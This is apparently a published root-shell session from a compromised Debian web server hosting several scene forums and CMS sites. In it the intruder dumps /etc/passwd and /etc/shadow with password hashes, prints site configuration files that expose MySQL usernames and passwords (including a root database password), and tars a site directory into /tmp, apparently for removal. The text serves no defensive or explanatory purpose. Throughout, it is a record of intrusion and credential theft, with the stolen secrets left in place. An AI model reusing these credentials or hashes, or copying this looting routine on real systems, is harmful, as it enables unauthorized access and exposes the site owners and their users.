morphy 2.6.18-164.11.1.el5.028stab068.3 #1 SMP Wed Feb 17 15:22:30 MSK 2010 x86_64 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/issue +Debian GNU/Linux 5.0 \n \l + +# cat /etc/passwd /etc/shadow +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin +mysql:x:102:104:MySQL Server,,,:/var/lib/mysql:/bin/false +Debian-exim:x:103:105::/var/spool/exim4:/bin/false +proftpd:x:104:65534::/var/run/proftpd:/bin/false +ftp:x:105:65534::/home/ftp:/bin/false +hdf:x:1000:1000::/home/hdf:/bin/sh +root:$1$SwmLmdGE$Unk7WkRpv7NF3O/0YSTCh/:14849:0:99999:7::: +daemon:*:14237:0:99999:7::: +bin:*:14237:0:99999:7::: +sys:*:14237:0:99999:7::: +sync:*:14237:0:99999:7::: +games:*:14237:0:99999:7::: +man:*:14237:0:99999:7::: +lp:*:14237:0:99999:7::: +mail:*:14237:0:99999:7::: +news:*:14237:0:99999:7::: +uucp:*:14237:0:99999:7::: +proxy:*:14237:0:99999:7::: +www-data:*:14237:0:99999:7::: +backup:*:14237:0:99999:7::: +list:*:14237:0:99999:7::: +irc:*:14237:0:99999:7::: +gnats:*:14237:0:99999:7::: +nobody:*:14237:0:99999:7::: +libuuid:!:14237:0:99999:7::: +sshd:*:14237:0:99999:7::: +mysql:!:14647:0:99999:7::: +Debian-exim:!:14647:0:99999:7::: +proftpd:!:14655:0:99999:7::: 
+ftp:$1$0LKSrIAD$rt1vOaeYC8GrKvVzI.T6s.:14662:0:99999:7::: +hdf:$1$RQkebH9N$LrPDCbeYn3.czmOpaM8nn.:14662:0:99999:7::: + +# cd / && ls -la +total 168 +drwxr-xr-x 21 root root 4096 Nov 18 23:11 . +drwxr-xr-x 21 root root 4096 Nov 18 23:11 .. +drwxr-xr-x 10 root root 4096 Feb 15 2010 SMF +lrwxrwxrwx 1 root root 39 Nov 13 13:09 aquota.group -> /proc/vz/vzaquota/0000001e/aquota.group +lrwxrwxrwx 1 root root 38 Nov 13 13:09 aquota.user -> /proc/vz/vzaquota/0000001e/aquota.user +-rwxr-xr-x 1 root root 122 Aug 21 17:30 backup.sh +drwxr-xr-x 2 root root 4096 May 13 2010 bin +drwxr-xr-x 2 root root 4096 Dec 4 2008 boot +drwxr-xr-x 4 root root 4096 Jan 7 06:25 dev +drwxr-xr-x 57 root root 4096 Nov 13 13:09 etc +drwxr-xr-x 4 root root 4096 Feb 15 2010 home +drwxr-xr-x 10 root root 4096 Feb 15 2010 lib +lrwxrwxrwx 1 root root 4 Mar 15 2010 lib64 -> /lib +drwxr-xr-x 2 root root 4096 Dec 24 2008 media +drwxr-xr-x 2 root root 4096 Dec 4 2008 mnt +drwxr-xr-x 2 root root 4096 Dec 24 2008 opt +dr-xr-xr-x 55 root root 0 Nov 13 13:09 proc +drwx------ 6 root root 4096 Jan 7 22:18 root +drwxr-xr-x 2 root root 4096 Feb 7 2010 sbin +drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux +drwxr-xr-x 2 root root 4096 Dec 24 2008 srv +drwxr-xr-x 3 root root 0 Nov 13 13:09 sys +drwxrwxrwt 4 root root 4096 Jan 7 18:22 tmp +drwxr-xr-x 11 root root 4096 Dec 24 2008 usr +drwxr-xr-x 14 root root 4096 Mar 15 2010 var +-rwxr-xr-x 1 root root 83749 Sep 8 17:15 xgoogler + +# cat backup.sh +#!/bin/bash + +name=`date | sed -e "s/ /_/g"` +name=`echo "/${name}__vpn24org_backup.tgz"` +tar cfvz "$name" /root/ /var/www/ + +# cd /var/www && ls -la +total 40 +drwxr-xr-x 9 root root 4096 Dec 28 02:33 . +drwxr-xr-x 14 root root 4096 Mar 15 2010 .. 
+drwxr-xr-x 2 root root 4096 Nov 15 17:35 a +drwxrwxrwx 3 root root 4096 Oct 13 23:26 dreckrebea12313 +drwxrwxrwx 3 root root 4096 Apr 15 2010 dreckrebea12313123123131313131312313123 +-rwxrwxrwx 1 root root 1 Sep 16 23:19 index.php +drwxr-xr-x 16 root root 4096 Oct 17 22:20 sadas.org +drwxrwxrwx 4 root root 4096 Oct 1 09:18 scenecms.org +drwxr-xr-x 3 root root 4096 Dec 13 22:18 vpn24.org + +# cd dreckrebea12313 && ls -la +total 20 +drwxrwxrwx 3 root root 4096 Oct 13 23:26 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 132 Oct 13 23:15 adsads.rar +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +drwxrwxrwx 3 root root 4096 Jan 7 22:20 web + +# cd web && ls -la +total 40 +drwxrwxrwx 3 root root 4096 Jan 7 22:20 . +drwxrwxrwx 3 root root 4096 Oct 13 23:26 .. +drwsrwsrwt 9 root root 4096 Apr 22 2010 board +-rwsrwsrwt 1 root root 1033 Apr 19 2010 index.php #+s root? Holy crap! +-rw-r--r-- 1 root root 0 Apr 22 2010 ipinfo.html +-rw-r--r-- 1 root root 23564 Apr 19 2010 sc.png + +# cd board && ls -la +total 228 +drwsrwsrwt 9 root root 4096 Apr 22 2010 . +drwxrwxrwx 3 root root 4096 Jan 7 22:20 .. 
+drwxrwxrwx 3 root root 4096 Apr 22 2010 Packages +-rw-r--r-- 1 root root 74243 Feb 14 2010 SSI.php +-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings.php +-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings_bak.php +drwxrwxrwx 5 root root 4096 Apr 22 2010 Smileys +drwxr-sr-x 2 root root 4096 Apr 22 2010 Sources +drwxrwxrwx 8 root root 4096 Apr 22 2010 Themes +-rwxrwxrwx 1 root root 3343 Jun 5 2005 agreement.txt +drwxrwxrwx 2 root root 4096 Apr 24 2010 attachments +drwxrwxrwx 4 root root 4096 Apr 22 2010 avatars +drwxrwxrwx 2 root root 12288 Dec 28 02:20 cache +-rw-r--r-- 1 root root 15347 Feb 14 2010 index.php +-rw-r--r-- 1 root root 3975 Jan 6 2009 license.txt +-rw-r--r-- 1 root root 2650 Feb 23 2010 news_readme.html +-rw-r--r-- 1 root root 12350 Feb 23 2010 readme.html +-rw-r--r-- 1 root root 30030 Feb 14 2010 ssi_examples.php +-rw-r--r-- 1 root root 5909 Jan 1 2010 ssi_examples.shtml +-rw-r--r-- 1 root root 10147 Feb 14 2010 subscriptions.php + +# cat Settings.php +<?php +/********************************************************************************** +* Settings.php * +*********************************************************************************** +* SMF: Simple Machines Forum * +* Open-Source Project Inspired by Zef Hemel (zef@zefhemel.com) * +* =============================================================================== * +* Software Version: SMF 2.0 RC3 * +* Software by: Simple Machines (http://www.simplemachines.org) * +* Copyright 2006-2010 by: Simple Machines LLC (http://www.simplemachines.org) * +* 2001-2006 by: Lewis Media (http://www.lewismedia.com) * +* Support, News, Updates at: http://www.simplemachines.org * +*********************************************************************************** +* This program is free software; you may redistribute it and/or modify it under * +* the terms of the provided license as published by Simple Machines LLC. 
* +* * +* This program is distributed in the hope that it is and will be useful, but * +* WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY * +* or FITNESS FOR A PARTICULAR PURPOSE. * +* * +* See the "license.txt" file for details of the Simple Machines license. * +* The latest version can always be found at http://www.simplemachines.org. * +**********************************************************************************/ + +########## Maintenance ########## +# Note: If $maintenance is set to 2, the forum will be unusable! Change it to 0 to fix it. +$maintenance = 0; # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!) +$mtitle = 'Maintenance Mode'; # Title for the Maintenance Mode message. +$mmessage = 'Okay faithful users...we\'re attempting to restore an older backup of the database...news will be posted once we\'re back!'; # Description of why the forum is in maintenance mode. + +########## Forum Info ########## +$mbname = 'SceneCrypt'; # The name of your forum. +$language = 'english'; # The default language file set for the forum. +$boardurl = 'http://scenecrypt.org/board'; # URL to your forum's folder. (without the trailing /!) +$webmaster_email = 'admin@admin.de'; # Email address to send emails from. (like noreply@yourdomain.com.) +$cookiename = 'SMFCookie410'; # Name of the cookie to set for authentication. + +########## Database Info ########## +$db_type = 'mysql'; +$db_server = 'localhost'; +$db_name = 'smf13'; +$db_user = 'root'; +$db_passwd = 'QkZorIZZC5e'; +$ssi_db_user = ''; +$ssi_db_passwd = ''; +$db_prefix = 'smf13_'; +$db_persist = 0; +$db_error_send = 1; + +########## Directories/Files ########## +# Note: These directories do not have to be changed unless you move things. +$boarddir = '/var/www/scenecrypt.org/web/board'; # The absolute path to the forum's folder. (not just '.'!) 
+$sourcedir = '/var/www/scenecrypt.org/web/board/Sources'; # Path to the Sources directory. +$cachedir = '/var/www/scenecrypt.org/web/board/cache'; # Path to the cache directory. + +########## Error-Catching ########## +# Note: You shouldn't touch these settings. +$db_last_error = 0; + + +# Make sure the paths are correct... at least try to fix them. +if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt')) + $boarddir = dirname(__FILE__); +if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources')) + $sourcedir = $boarddir . '/Sources'; +if (!file_exists($cachedir) && file_exists($boarddir . '/cache')) + $cachedir = $boarddir . '/cache'; + +$db_character_set = 'utf8'; + +# cd /var/www/dreckrebea12313123123131313131312313123/ && ls -la +total 16 +drwxrwxrwx 3 root root 4096 Apr 15 2010 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +drwxrwxrwx 4 root root 4096 Apr 15 2010 web + +# cd web && ls -la +total 68 +drwxrwxrwx 4 root root 4096 Apr 15 2010 . +drwxrwxrwx 3 root root 4096 Apr 15 2010 .. 
+-rwxrwxrwx 1 root root 983 Mar 15 2010 conf.php +drwxrwxrwx 3 root root 4096 May 11 2010 images +-rw-r--r-- 1 root root 42787 Apr 15 2010 index.php +-rw-r--r-- 1 root root 1 Apr 15 2010 index__.php +drwxrwxrwx 3 root root 4096 Mar 15 2010 psc + +# cat conf.php +<?php +define(_SceneCMS_footer, "SceneCMS v1.0"); +define(_SceneCMS_admin, "mimimi"); +define(_SceneCMS_Host, "localhost"); +define(_SceneCMS_Username, "qstore"); +define(_SceneCMS_Password, "4cFRwaLnt2qS2QSp"); +define(_SceneCMS_Database, "qstore"); + +mysql_connect(_SceneCMS_Host,_SceneCMS_Username,_SceneCMS_Password); +mysql_select_db(_SceneCMS_Database); + + + function strFilter($text) { + return (string)htmlentities($text); + } + +function sql_str_escape($str) { + if(get_magic_quotes_gpc()) + stripslashes($str); + return mysql_real_escape_string($str); +} + + function Logout() { + $_SESSION['cms_name'] = ""; + $_SESSION['cms_validate'] = ""; + session_destroy(); + + } + + function CheckLogin($killtrue) { + + if ($_SESSION['cms_name'] == "" or $_SESSION['cms_validate'] == "") { + if($killtrue == 1 or $killtrue == "1") { + echo ' + <script> + window.location.href = "?"; + </script> + '; + die("No Access"); + exit(); + } + return "0"; + } else { + return "1"; + } + } +?> + +# tar cvjf /tmp/psc.tar.bz2 psc/ +psc/ +psc/data/ +psc/data/money-coin.png +psc/data/Webbrowser.class.php +psc/data/bg_code.jpg +psc/data/bg.jpg +psc/data/bg_lock.jpg +psc/data/bg_captcha.jpg +psc/index.html +psc/api.php +psc/cookie.txt + +# cd /var/www/sadas.org/ && ls -la +total 5632 +drwxr-xr-x 16 root root 4096 Oct 17 22:20 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. 
+-rw-r--r-- 1 root root 19565 Apr 5 2010 LICENSE +drwxr-xr-x 3 root root 4096 Apr 5 2010 admincp +-rw-r--r-- 1 root root 23760 Apr 5 2010 ajax.php +-rw-r--r-- 1 root root 75427 Apr 5 2010 album.php +-rw-r--r-- 1 root root 17051 Apr 5 2010 announcement.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 archive +-rw-r--r-- 1 root root 18225 Apr 5 2010 attachment.php +-rw-r--r-- 1 root root 75242 Apr 5 2010 calendar.php +-rw-r--r-- 1 root root 58135 Apr 5 2010 checksums.md5 +-rw-r--r-- 1 root root 43 Apr 5 2010 clear.gif +drwxr-xr-x 4 root root 4096 Apr 5 2010 clientscript +-rw-r--r-- 1 root root 15277 Apr 5 2010 converse.php +drwxr-xr-x 7 root root 4096 Apr 5 2010 cpstyles +-rw-r--r-- 1 root root 3233 Apr 5 2010 cron.php +drwxr-xr-x 3 root root 4096 Apr 5 2010 customavatars +drwxr-xr-x 3 root root 4096 Apr 5 2010 customgroupicons +drwxr-xr-x 2 root root 4096 Apr 5 2010 customprofilepics +-rw-r--r-- 1 root root 3485 Apr 5 2010 dgt_released.nfo +-rw-r--r-- 1 root root 47671 Apr 5 2010 editpost.php +-rw-r--r-- 1 root root 29410 Apr 5 2010 external.php +-rw-r--r-- 1 root root 9702 Apr 5 2010 faq.php +-rw-r--r-- 1 root root 10134 Apr 5 2010 favicon.ico +-rw-r--r-- 1 root root 521 Apr 5 2010 file_id.diz +-rw-r--r-- 1 root root 35900 Apr 5 2010 forumdisplay.php +-rw-r--r-- 1 root root 39747 Apr 5 2010 global.php +-rw-r--r-- 1 root root 138104 Apr 5 2010 group.php +-rw-r--r-- 1 root root 24835 Apr 5 2010 group_inlinemod.php +-rw-r--r-- 1 root root 10747 Apr 5 2010 groupsubscription.php +-rw-r--r-- 1 root root 8963 Apr 5 2010 image.php +drwxr-xr-x 16 root root 4096 Apr 5 2010 images +drwxr-xr-x 6 root root 12288 May 22 2010 includes +-rw-r--r-- 1 root root 19508 Apr 5 2010 index.php +-rw-r--r-- 1 root root 43844 Apr 5 2010 infraction.php +-rw-r--r-- 1 root root 182837 Apr 5 2010 inlinemod.php +drwxr-xr-x 2 root root 4096 May 22 2010 install +-rw-r--r-- 1 root root 10258 Apr 5 2010 joinrequests.php +-rw-r--r-- 1 root root 10138 Apr 5 2010 login.php +-rw-r--r-- 1 root root 16980 Apr 5 
2010 member.php +-rw-r--r-- 1 root root 15847 Apr 5 2010 member_inlinemod.php +-rw-r--r-- 1 root root 35817 Apr 5 2010 memberlist.php +-rw-r--r-- 1 root root 23782 Apr 5 2010 misc.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 modcp +-rw-r--r-- 1 root root 63240 Apr 5 2010 moderation.php +-rw-r--r-- 1 root root 6672 Apr 5 2010 moderator.php +-rw-r--r-- 1 root root 18392 Apr 5 2010 newattachment.php +-rw-r--r-- 1 root root 37017 Apr 5 2010 newreply.php +-rw-r--r-- 1 root root 18827 Apr 5 2010 newthread.php +-rw-r--r-- 1 root root 19520 Apr 5 2010 online.php +-rw-r--r-- 1 root root 7612 Apr 5 2010 payment_gateway.php +-rw-r--r-- 1 root root 11826 Apr 5 2010 payments.php +-rw-r--r-- 1 root root 7805 Apr 5 2010 picture.php +-rw-r--r-- 1 root root 21956 Apr 5 2010 picture_inlinemod.php +-rw-r--r-- 1 root root 25223 Apr 5 2010 picturecomment.php +-rw-r--r-- 1 root root 27328 Apr 5 2010 poll.php +-rw-r--r-- 1 root root 9428 Apr 5 2010 posthistory.php +-rw-r--r-- 1 root root 74284 Apr 5 2010 postings.php +-rw-r--r-- 1 root root 6509 Apr 5 2010 printthread.php +-rw-r--r-- 1 root root 70656 Apr 5 2010 private.php +-rw-r--r-- 1 root root 152244 Apr 5 2010 profile.php +-rw-r--r-- 1 root root 39667 Apr 5 2010 register.php +-rw-r--r-- 1 root root 5603 Apr 5 2010 report.php +-rw-r--r-- 1 root root 13635 Apr 5 2010 reputation.php +-rw-r--r-- 1 root root 124633 Apr 5 2010 search.php +-rw-r--r-- 1 root root 20862 Apr 5 2010 sendmessage.php +-rw-r--r-- 1 root root 9925 Apr 5 2010 showgroups.php +-rw-r--r-- 1 root root 12304 Apr 5 2010 showpost.php +-rw-r--r-- 1 root root 75611 Apr 5 2010 showthread.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 signaturepics +-rw-r--r-- 1 root root 32792 Apr 5 2010 subscription.php +-rw-r--r-- 1 root root 13281 Apr 5 2010 tags.php +-rw-r--r-- 1 root root 8608 Apr 5 2010 threadrate.php +-rw-r--r-- 1 root root 12331 Apr 5 2010 threadtag.php +drwxr-xr-x 2 root root 4096 May 22 2010 upload +-rw-r--r-- 1 root root 34424 Apr 5 2010 usercp.php +-rw-r--r-- 1 root 
root 19011 Apr 5 2010 usernote.php +-rw-r--r-- 1 root root 29490 Apr 5 2010 validator.php +-rw-r--r-- 1 root root 3417514 May 22 2010 vb38.rar +-rw-r--r-- 1 root root 27293 Apr 5 2010 visitormessage.php +drwxr-xr-x 2 root root 4096 May 22 2010 web + +# cat includes/config.php +<?php +/*======================================================================*\ +|| #################################################################### || +|| # vBulletin 3.8.5 +|| # ---------------------------------------------------------------- # || +|| # All PHP code in this file is ?2000-2010 Jelsoft Enterprises Ltd. # || +|| # This file may not be redistributed in whole or significant part. # || +|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || +|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || +|| #################################################################### || +\*======================================================================*/ + +/*-------------------------------------------------------*\ +| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* | ++---------------------------------------------------------+ +| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten- | +| bank Fehler auftreten, muessen Sie Ihren Provider um | +| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die | +| Variablen in dieser Datei nicht nennen koennen. | +\*-------------------------------------------------------*/ + + // ****** DATENBANK: TYP ****** + // Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank + // befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli. + // Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden. + // Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein. 
+$config['Database']['dbtype'] = 'mysql'; + + // ****** DATENBANK: NAME DER DATENBANK ****** + // Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll. + // Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider. +$config['Database']['dbname'] = 'cccteam'; + + // ****** TABELLEN-PRAEFIX ****** + // Praefix, das den Tabellennamen in der Datenbank vorangestellt wird. + // Zum Beispiel: $config['Database']['tableprefix'] = 'vb3_'; + // Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei + // install/tableprefix.php hinzufuegen, aendern oder entfernen. +$config['Database']['tableprefix'] = ''; + + // ****** TECHNISCHE E-MAIL-ADRESSE ****** + // Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung + // an diese Adresse geschickt. + // Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine + // E-Mails verschickt. +$config['Database']['technicalemail'] = 'dbmeister@beispiel.xy'; + + // ****** LEEREN SQL-MODUS ERZWINGEN ****** + // In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin + // kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen + // deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert. +$config['Database']['force_sql_mode'] = false; + + + + // ****** MASTER-DATENBANK: SERVERNAME UND PORT ****** + // Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein. + // Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst + // mit dem Standardwerten. +$config['MasterServer']['servername'] = 'localhost'; +$config['MasterServer']['port'] = 3306; + + // ****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ****** + // Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff + // auf den MySQL-Server benoetigen. 
+ // Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider. +$config['MasterServer']['username'] = 'root'; +$config['MasterServer']['password'] = 'QkZorIZZC5e'; + + // ****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ****** + // Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen. + // Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht + // bei extrem grossen Foren. + // Wenn Sie nicht sicher sind, was Sie hier angeben sollen, lassen Sie die Einstellung + // auf aus. + // 0 = aus; 1 = an +$config['MasterServer']['usepconnect'] = 0; + + + + // ****** SLAVE-DATENBANK: KONFIGURATION ****** + // Wenn Sie zwei Datenbankserver verwenden, koennen Sie hier die Daten fuer den Slave-Server + // festlegen. + // Wenn Sie sich nicht 100% sicher sind, ob Sie hier etwas eintragen muessen, veraendern Sie die + // Standardeinstellungen nicht. +$config['SlaveServer']['servername'] = ''; +$config['SlaveServer']['port'] = 3306; +$config['SlaveServer']['username'] = ''; +$config['SlaveServer']['password'] = ''; +$config['SlaveServer']['usepconnect'] = 0; + + + + // ****** PFADE ZUM ADMINISTRATOR- UND MODERATOR-KONTROLLZENTRUM ****** + // Hier koennen Sie fuer die Verzeichnisse, in denen sich die Dateien fuer das + // Administrator- und Moderator-Kontrollzentrum befinden, alternative Namen an- + // geben. Vielleicht moechten Sie dies aus Sicherheitsgruenden tun. + // Bitte beachten Sie, dass, wenn Sie die Namen hier aendern, Sie auch noch die + // Namen der Verzeichnisse auf dem Server aendern muessen. +$config['Misc']['admincpdir'] = 'admincp'; +$config['Misc']['modcpdir'] = 'modcp'; + + // ****** COOKIE-PRAEFIX ****** + // Praefix, das in allen vBulletin-Cookies enthalten ist. + // Halten Sie es kurz und verwenden Sie nur Zahlen und Buchstaben, d.h. 
1-9 und a-Z +$config['Misc']['cookieprefix'] = 'bb'; + + // ****** VOLLSTAENDIGER PFAD ZUM VERZEICHNIS DES FORUMS ****** + // Bei einigen Servern kann es noetig sein, den vollstaendigen Pfad zum Verzeichnis des Forums + // anzugeben, damit vBulletin ohne Probleme funktioniert. Sie muessen diese Einstellung nur + // aendern, wenn vBulletin Sie dazu auffordert. + // Hinweis: Verwenden Sie keinen abschliessenden Schraegstrich ('/') nach dem Verzeichnisnamen. + // Beispiel fuer Unix: + // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; + // Beispiel fuer Win32: + // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; +$config['Misc']['forumpath'] = ''; + + // ****** COOKIE SICHERHEITS HASH ****** + // Diese Option erlaubt die Cookies zu verschluesseln. + // Benutzbar sind dabei jegliche Zahlen und Buchstaben, d.h. 1-9 und a-Z. + // Diese Angabe kann leer gelassen werden um den Standard zu benutzen. + // Hinweis: Bei Aenderung werden alle Benutzer ausgeloggt. +$config['Misc']['cookie_security_hash'] = ''; + + + // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG SEHEN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum das + // Kontrollzentrum-Log ansehen. + // Die Benutzer werden hier durch ihre User-ID angegeben. Um die User-ID heraus- + // zufinden, sehen Sie sich den Benutzer im Administrator-Kontrollzentrum an. + // Falls Sie diese Datei fuer eine Neuinstallation aendern, lassen Sie den Standard- + // wert stehen, da der erste Benutzer (Administrator) die User-ID 1 erhaelt. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander. 
+ // Beispiel 1: $config['SpecialUsers']['canviewadminlog'] = '1'; + // Beispiel 2: $config['SpecialUsers']['canviewadminlog'] = '1,5,9'; +$config['SpecialUsers']['canviewadminlog'] = '1'; + + // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG LOESCHEN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // Eintraege aus dem Kontrollzentrum-Log loeschen. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['canpruneadminlog'] = '1'; + + // ****** BENUTZER, DIE QUERYS AUSFUEHREN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // Querys (Datenbankabfragen) ausfuehren. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). + // Hinweis: Querys ausfuehren zu koennen, kann eine kritische Angelegenheit sein. + // Aus Sicherheitsgruenden sollten Sie in diese Liste keine User-IDs eintragen. +$config['SpecialUsers']['canrunqueries'] = ''; + + // ****** UNLOESCHBARE / UNVERAENDERBARE BENUTZER ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // von anderen Benutzern nicht geloescht oder bearbeitet werden. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['undeletableusers'] = ''; + + // ****** SUPER-ADMINISTRATOREN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum die + // Seite fuer die Administrator-Berechtigungen aufrufen und damit die Rechte + // anderer Administratoren bearbeiten. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['superadministrators'] = '1'; + + // ****** DATASTORE-CACHE KONFIGURATION ****** + // Hier koennen Sie die verschiedenen Methoden konfigurieren, die fuer den Cache + // der Datastore-Elemente verwendet werden. 
+ // vB_Datastore_Filecache - um die Cache-Datei /includes/datastore/datastore_cache.php zu verwenden (CHMOD 777 benoetigt) + // vB_Datastore_APC - um APC zu verwenden + // vB_Datastore_XCache - um XCache zu verwenden + // vB_Datastore_eAccelerator - um eAccelerator zu verwenden + // vB_Datastore_Memcached - um einen Memcache-Server zu verwenden (Konfiguration weiter unten) +// $config['Datastore']['class'] = 'vB_Datastore_Filecache'; + + // ****** DATASTORE-PRAEFIX ****** + // Wenn Sie einen PHP-Cache (APC, XCache, eAccelerator) verwenden und auf Ihrem + // Server mehr als ein Forum installiert ist, *kann* es sein, dass Sie hier + // ein Datastore-Praefix angeben muessen, damit die Foren nicht dieselbe + // Variable im Cache verwenden. + // Dies funktioniert aehnlich wie das Tabellen-Praefix fuer die Datenbank. +// $config['Datastore']['prefix'] = ''; + + // Bei einem Memcache-Server ist es auch notwendig, dass Sie den Hostnamen bzw. + // die IP-Adresse und den Port angeben, unter denen der Server erreichbar ist: +/* +$config['Datastore']['class'] = 'vB_Datastore_Memcached'; +$i = 0; +// Erster Server +$i++; +$config['Misc']['memcacheserver'][$i] = '127.0.0.1'; +$config['Misc']['memcacheport'][$i] = 11211; +$config['Misc']['memcachepersistent'][$i] = true; +$config['Misc']['memcacheweight'][$i] = 1; +$config['Misc']['memcachetimeout'][$i] = 1; +$config['Misc']['memcacheretry_interval'][$i] = 15; +*/ + +// ******************************************************************************** +// ****** Die folgenden Einstellungen werden nur in Spezialfaellen benoetigt ****** +// ******************************************************************************** + + // ****** MySQLI-EINSTELLUNGEN ****** + // Wenn Sie MySQL 4.1+ verwenden, sollte MySQLi fuer die Verbindung zur Datenbank + // verwendet werden. + // Wenn Ihre Datenbank einen anderen Zeichensatz als 'latin1' verwendet, koennen Sie + // hier den Standard-Zeichensatz fuer die Verbindung angeben. 
+ // Wenn Sie nicht denselben Zeichensatz angeben, den Ihre Datenbank verwendet, kann + // es zu Fehlermeldungen dieser Art kommen: + // 'mysql error: Illegal mix of collations' + // Sie muessen diese Einstellung nur aendern, wenn Sie sicher wissen, dass dies noetig ist. +// $config['Mysqli']['charset'] = 'utf8'; + + // Zusaetzlich kann PHP angewiesen werden, die Verbindungs-Parameter aus der Datei + // auszulesen, die in 'ini_file' angegeben wurde. Bitte geben Sie den vollstaendigen + // Pfad zu dieser Datei an. + // Beispiel: + // $config['Mysqli']['ini_file'] = 'C:\Programme\MySQL\MySQL Server 4.1\my.ini'; +$config['Mysqli']['ini_file'] = ''; + + // Einstellungen fuer die Grafikverarbeitung + // Alle Grafiken, die groesser als die unten angegebenen Dimensionen sind, werden von + // vBulletin nicht verkleinert. Wenn auch groessere Grafiken verkleinert werden sollen, + // passen Sie diese Einstellungen an. +$config['Misc']['maxwidth'] = 2592; +$config['Misc']['maxheight'] = 1944; + + // GZIP komplett deaktivieren: Dies ist noetig, wenn auf dem Server standardmaessig + // GZIP aktiv ist und diese Option auch im Administrator-Kontrollzentrum aktiviert wurde. + // Dadurch ist oft in vBulletin keine Anmeldung mehr moeglich. + // Moeglicherweise ist es noetig, die folgende Zeile in der Datei /includes/init.php oder + // /includes/class_core.php aufzunehmen, damit dieser Eintrag wirksam wird. +//define('NOZIP', 1); + + // Plug-in-System komplett deaktivieren: Dies ist noetig, wenn durch + // fehlerhafte Plug-ins in vBulletin keine Anmeldung mehr moeglich ist. +//define('DISABLE_HOOKS', 1); + + // Keine E-Mails verschicken. Diese Einstellung sollte fuer ein Test-Forum aktiviert werden. +//define('DISABLE_MAIL', true); + + // Debug-Modus aktivieren: Nur fuer Entwickler gedacht. 
